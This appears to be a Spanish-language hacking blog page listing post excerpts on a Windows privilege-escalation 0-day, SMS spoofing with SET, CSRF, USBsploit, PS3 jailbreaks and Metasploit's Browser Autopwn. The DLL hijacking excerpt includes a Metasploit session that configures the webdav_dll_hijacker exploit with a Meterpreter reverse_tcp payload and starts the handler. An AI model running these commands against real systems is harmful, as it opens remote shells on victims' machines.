Hace poco se publico una vulnerabilidad 0-day que afectaba la mayoria de las plataformas Windows(7/vista/2008) , dicho fallo podria ser explotada por atacantes locales para lograr el control completo de un sistema vulnerable. Este “problema” es causado por un error de validación en el servicio de administración de tareas el cual falla al prevenir que los usuarios manipulen ciertos campos en el esquema del archivo XML por medio de la interface COM, lo cual podría permitir a un usuario malicioso manipular los archivos XML validos y “saltarse” el chequeo de integridad CRC32 y ejecutar código de manera arbitraria con privilegios Administrativos
Categoría: Hacking
Hacking
Uso de SMS Spoofing desde SET
provechando la publicación de los vídeos de la NcN, para aquellos que estén interesados, comentamos que durante la charla se realizó una demostración del uso de la funcionalidad de “SMS Spoofing” que se ha añadido a la versión 1.0 de Social Engineering Toolkit (SET). Por cierto, aprovechamos tambén para agradecer a Dave Keneddy la “acogida” de la aportación al framework de SET. Ha sido un auténtico placer poder colaborar con este proyecto.
En este post nos gustaría acabar de repasar las diferentes opciones disponibles des de la funcionalidad de “SMS Spoofing”.
Tutorial Vulnerabilidad CSRF
Inicio Tutorial Cross Site Request Forgery By ShadinessDark = Zero Bits
1.) Presentación
2.) Que es CSRF
3.) Quien descubrió la vulnerabilidad CSRF
4.) CSRF y Xss
5) Robo de Cookies en XSS & CSRF (Diferencia) – Colaboracion de Zero Bits
6.) Testeando vulnerabilidad CSRF y programas el code vulnerable
7.) Sacando una conclusión a todo
8.) Como cuidar nuestra Web de este tipo de ataques
9.) Despedida
1.) Presentación
Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial
Para dar la diferencia de otros tutoriales que he visto en la red…
¿Por qué diferente?
Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados
¿A que se debe este tutorial?
Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo
No es mi culpa que un Web Master no me haga caso ¿Verdad?
Los saludos más especiales para mis compañeros:
Zero Bits
KuTer
Jeferx
Darki113r
_84kur10_
Z1z30f
Kozmic.Kizz
Kinect como cámara 3D
Los pequeños hacks que están apareciendo para el dispositivo de Microsoft están permitiendo lograr cosas muy interesantes, como convertir a Kinect en un dispositivo capaz de generar vídeo en 3D en tiempo real. Un usuario lo ha demostrado con un código que ya había utilizado en otros proyectos de realidad virtual en su proyecto de investigación, y combinando su solución con el código que el joven español Hector Martín lanzó hace pocos días, ha logrado una aplicación espectacular.
El código desarrollado por Martín nada más aparecer Kinect en nuestro país permitió poder acceder a algunas de las posibilidades del dispositivo de Microsoft pero no desde la consola Xbox 360 para la que está dirigido, sino conectándolo a PCs y portátiles a través del puerto USB.
USBSploit
USBsploit es una herramienta que está todavía en versión beta y ha sido creado por un investigador de Infosec y propietario de la Secubsimage popular portal.
Esta herramienta hace que sea sencillo para cualquier persona que desea volcar archivos desde dispositivos USB a distancia en múltiples objetivos al mismo tiempo.Funciona a través de sesiones Meterpreter con una luz (24 MB) una versión modificada deMetasploit. La interfaz es una versión modificada del JUEGO.
Hackean la PlayStation 3 utilizando una calculadora
Navegando por la red de redes me he topado con una noticia curiosa: Han realizado unjailbreak a la PS3 desde una calculadora TI84. Aunque han utilizado el PSGroove, el dispositivo utilizado no deja de ser curioso, ya que hasta ahora se ha hackeado la PS3 desde un pendrive o incluso utilizando teléfonos móviles.
La calculadora se conecta con un cable USB A a mini cable USB-B (incluido con la calculadora) y se utiliza para cargar los controladores de PS3. Aunque es mejor que veáis un vídeo demostrativo:
[youtube=http://www.youtube.com/watch?v=vOSpCoCmOns]
Visto en: http://www.softzone.es/2010/09/12/hackean-la-playstation-3-utilizando-una-calculadora/
Palm Pre y Nokia N900, nuevos dispositivos capaces de Hackear el PS3
Son muchas las noticias que les hemos llevado sobre el Jailbreak en el PS3 y, aunque hace poco leíamos sobre las palabras de Germán que posiblemente era el final de éste movimiento, muchos -en nuestro interior- sabíamos que apenas era el comienzo. Es que cuando se trata de piratear o alterar el software de algún dispositivo reconocido como el iPhone o, en este caso la PS3, es inevitable que los avances dejen de salir.
DLL Hijacking con Metasploit
Aunque no es algo nuevo, últimamente se habla mucho sobre DLL Hijacking o suplantación de librerías DLL, gracias al reciente fallo de los sistemas Microsoft Windows que permite ejecutar código malicioso, colocando la dll a suplantar en la misma carpeta del programa ejecutable, descubierto hace poco por HD Moore y explicado a fondo en su articuloExploiting DLL Hijacking Flaws, también ha publicado un kit, para buscar aplicaciones que puedan ser vulnerables a este tipo de ataque DLLHijaAuditKit.
Abrimos metasplit
rokitoh@red-orbita# msfconsolemsf > use exploit/windows/browser/webdav_dll_hijackermsf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(webdav_dll_hijacker) > set EXTENSIONS «grp p7c vcf wab»EXTENSIONS => grp p7c vcf wabmsf exploit(webdav_dll_hijacker) > set lhost 192.168.1.111lhost => 192.168.1.111msf exploit(webdav_dll_hijacker) > exploit[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.111:4444[*][*] Exploit links are now available at \192.168.1.111documents[*][*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.111:80/
Creando un Exploit Paso a Paso
encontrada y finalmente, convertirlo en un módulo de Metasploit?, son algunas de las interrogantes que alguna vez nos hemos realizado y David Hoelzer , Senior Fellow en el Instituto SANS nos las resuelve con esta serie de vídeo tutoriales.
Metasploit – Browser Autopwn
Metasploit ofrece la posibilidad de lanzar exploits de acuerdo al la versión del browser que la victima este utilizando, es decir que si el usuario usa Firefox como su explorador predeterminado no se tendrán en cuenta (al momento de ejecutar el ataque) exploits para Internet Explorer.